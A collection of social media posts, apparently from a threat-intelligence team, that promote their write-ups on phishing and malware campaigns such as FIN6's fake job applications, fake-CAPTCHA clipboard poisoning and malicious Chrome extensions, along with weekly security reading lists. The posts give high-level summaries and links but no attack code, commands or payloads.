Cybercrime group FIN6 (aka Skeleton Spider) is leveraging trusted cloud services like AWS to deliver malware through fake job applications.

Our latest analysis breaks down:
🔹 How attackers use LinkedIn & Indeed to build trust
🔹 The use of resume-themed phishing lures
🔹 Cloud-hosted infrastructure that evades detection
🔹 The delivery of the More_eggs backdoor via .LNK files
🔹 Key defense strategies for recruiters and security teams

This campaign is a masterclass in low-complexity, high-evasion phishing

📖 Read the full breakdown: https://dti.domaintools.com/skeleton-spider-trusted-cloud-malware-delivery/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Skeleton-Spider

#CyberSecurity #ThreatIntel #FIN6 #Phishing #CloudSecurity #MalwareAnalysis #InfoSec #SkeletonSpider

We hope you enjoyed @danonsecurity and Jon DiMaggio’s presentation on Mapping Hidden Alliances in Russian-Affiliated Ransomware at hashtag#SleuthCon. Key takeaways from the mapping include:

🔹Reuse does not equal identity. Different groups may share code or have human overlap but are not the same entity.
🔹Group labeling is increasingly obsolete.
🔹The modern threat landscape is best understood by tracking clusters of activity, not just named groups, and focusing on similar activity rather than specific names.

Find the writeup and infographic here: https://dti.domaintools.com/mapping-hidden-alliances-russian-affiliated-ransomware/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Russian-Ransomware

DomainTools Investigations’ (DTI) latest analysis uncovers a technically sophisticated malware campaign that uses fake CAPTCHAs and spoofed document verification pages (like Docusign) to trick users into self-infecting their machines with the NetSupport RAT.

Key tactics include:

🔹 Clipboard poisoning via fake CAPTCHA pages
🔹Multi-stage PowerShell downloaders
🔹Spoofed Gitcodes and Docusign domains
🔹Infrastructure overlap with known threat groups like SocGholish, FIN7 and STORM-0408

Read the full breakdown including security recommendations here: https://dti.domaintools.com/how-threat-actors-exploit-human-trust/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Prove-You-Are-Human

#ThreatIntelligence #CyberSecurity #SocGholish #Malware

🎵 Ladies and gentlemen, this is Newsletter No. 5

Daniel Schwalbe, CISO and Head of Investigations, shares the 5th iteration of his newsletter this week. It highlights research published by the DomainTools Investigations team including:

🔹 An analysis on a malicious campaign using a fake website to spread VenomRAT
🔹 An unknown actor continuously creating malicious Chrome Browser extensions
🔹 How bad actors take advantage of viral media events

Find it here: https://www.domaintools.com/resources/blog/domaintools-investigations-may-2025-newsletter/?utm_source=Mastodon&utm_medium=Social&utm_campaign=DTI-Newsletter-May

🔥 Hot off the presses!

DomainTools Investigations shares that a spoofed antivirus download page is delivering VenomRAT, StormKitty, and SilentTrinity—a powerful combo for credential theft, persistence, and long-term access.

🔎 We traced the infrastructure, payloads, and attacker tactics.

Full breakdown: https://dti.domaintools.com/venomrat/?utm_source=Mastodon&utm_medium=Social&utm_campaign=VenomRAT

#CyberSecurity #ThreatIntel #MalwareAnalysis #Infosec

In an effort to share not just what we’re observing on the net, but what we’re reading and listening to elsewhere, @neurovagrant compiles an abbreviated digest of media being passed around within our team as well as what we’re seeing in the security community at large.

This week we're enjoying works from:

🔸 Maltego's Human Element Podcast (hosted by Ben April)
🔸 Citizen Lab (Rebekah Brown, Marcus Michaelsen, Matt Brooks, and Siena Anstis)
🔸NextGov (David DiMolfetta)
🔸Proofpoint (Genina Po, Kyle Cucci, Selena Larson, and the Proofpoint Threat Research Team)

Find the full reading list here: https://dti.domaintools.com/cybersecurity-reading-list-week-of-2025-05-19/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Reading-List-May

Since February 2024, a stealthy threat actor has launched 100+ fake websites and Chrome extensions that appear helpful, but secretly steal data, hijack sessions, and inject malicious code.
🔍 These extensions:

🔹 Masquerade as AI tools, VPNs, analytics, and more
🔹Request excessive permissions
🔹Connect to attacker-controlled servers
🔹Execute arbitrary code on every site you visit

🛡️ Protect Yourself:
🔹Only install extensions from verified developers
🔹Review permissions carefully
🔹Keep your browser & antivirus updated
🔹Regularly audit your installed extensions

Learn more from DomainTools Investigations here: https://dti.domaintools.com/dual-function-malware-chrome-extensions/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Chrome-Extensions

Since May 12, DomainTools has tracked 389+ suspicious domains mimicking Spotify targeting tech job-seekers amid a surge in job scams.

These domains show tight clustering across 7 metrics, suggesting a coordinated campaign. Many use Google MX records & are Cloudflare-protected.

Learn more here: https://www.domaintools.com/resources/blog/cluster-of-domains-targeting-spotify-job-seekers/?utm_source=LinkedIn&utm_medium=Social&utm_campaign=Spotify

Find IOCs on GitHub: https://github.com/DomainTools/SecuritySnacks/blob/main/2025/SpotifyJobSeekerTargeting.csv

Scammers pay attention to headlines just as much as we do, but their motivations are very different.

From the LA wildfires to AI tech breakthroughs, viral events dominate the news cycle—and cybercriminals are quick to exploit them. DomainTools Investigations’ latest research reveals how malicious domains and scam sites surge in the wake of breaking news, targeting unsuspecting users with fake donations, meme coins, and malware.

🔍 Discover:

How scammers use AI to ride the wave of viral media

Real-world examples of fake crypto coins & donation scams

Patterns linking scam sites across global events

📖 Read the full analysis here: https://dti.domaintools.com/scams-malicious-domains-breaking-news/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Breaking-News

#CyberSecurity #ThreatIntel #ScamAlert #BreakingNews #Infosec #Phishing #Malware #CryptoScams

In an effort to share not just what we’re observing on the net, but what we’re reading and listening to elsewhere, @neurovagrant compiles a monthly, abbreviated digest of media being passed around within our team as well as what we’re seeing in the security community at large.

This week we're enjoying works from:
🔸@TalosSecurity - Talos Takes - Year in Review podcast parts 1 ad 2
🔸SpyCloud - Exposed Credentials & Ransomware Operations: Using LLMs to Digest 200K Messages from the Black Basta Chats
🔸@404media - 4chan Is Down Following What Looks to Be a Major Hack Spurred By Meme War
🔸Infoblox - Disrupting Fast Flux With Protective DNS
🔸and more!

Find the full cybersecurity reading list here: https://dti.domaintools.com/cybersecurity-reading-list-week-of-2025-04-21/?utm_source=Mastodon&utm_medium=Social&utm_campaign=reading-list-april